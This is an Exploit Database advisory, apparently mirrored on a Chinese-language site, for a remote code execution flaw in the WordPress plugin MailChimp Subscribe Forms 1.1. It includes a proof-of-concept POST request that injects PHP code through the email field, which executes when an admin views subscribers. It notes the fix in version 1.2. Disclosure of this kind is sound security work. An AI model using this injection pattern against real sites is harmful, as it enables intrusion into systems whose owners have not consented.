WordPress Plugin MailChimp Subscribe Forms 1.1 – Remote Code Execution

Exploit Database
36 阅读

作者： woodspeed

日期： 2015-05-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37111/

# Exploit Title: WordPress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps

1. Description

Remote Code Execution via email field.

2. Proof of Concept

POST Request

sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=

When the admin user checks the subscibers list, the php code is executed.

3. Solution

Fixed in version 1.2

last Exploits
WordPress Plugin MailChimp Subscribe Forms 1.1 – Remote Code Execution的更多信息

MCL-Net 4.3.5.8788 – Information Disclosure：
Prima FlexAir Access Control 2.3.38 – Remote Code Execution：
PHP Classifieds Script 5.6.2 – SQL Injection：
iSeeQ Hybrid DVR WH-H4 2.0.0.P – (get_jpeg) Stream Disclosure：
eXtreme Message Board 1.9.11 – Multiple Cross-Site Request Forgery Vulnerabilities：
ReCMS – ‘users_lang’ Directory Traversal：
Rae Media Real Estate Single Agent – SQL Injection：
Open-Xchange App Suite 7.8.2 – Cross-Site Scripting：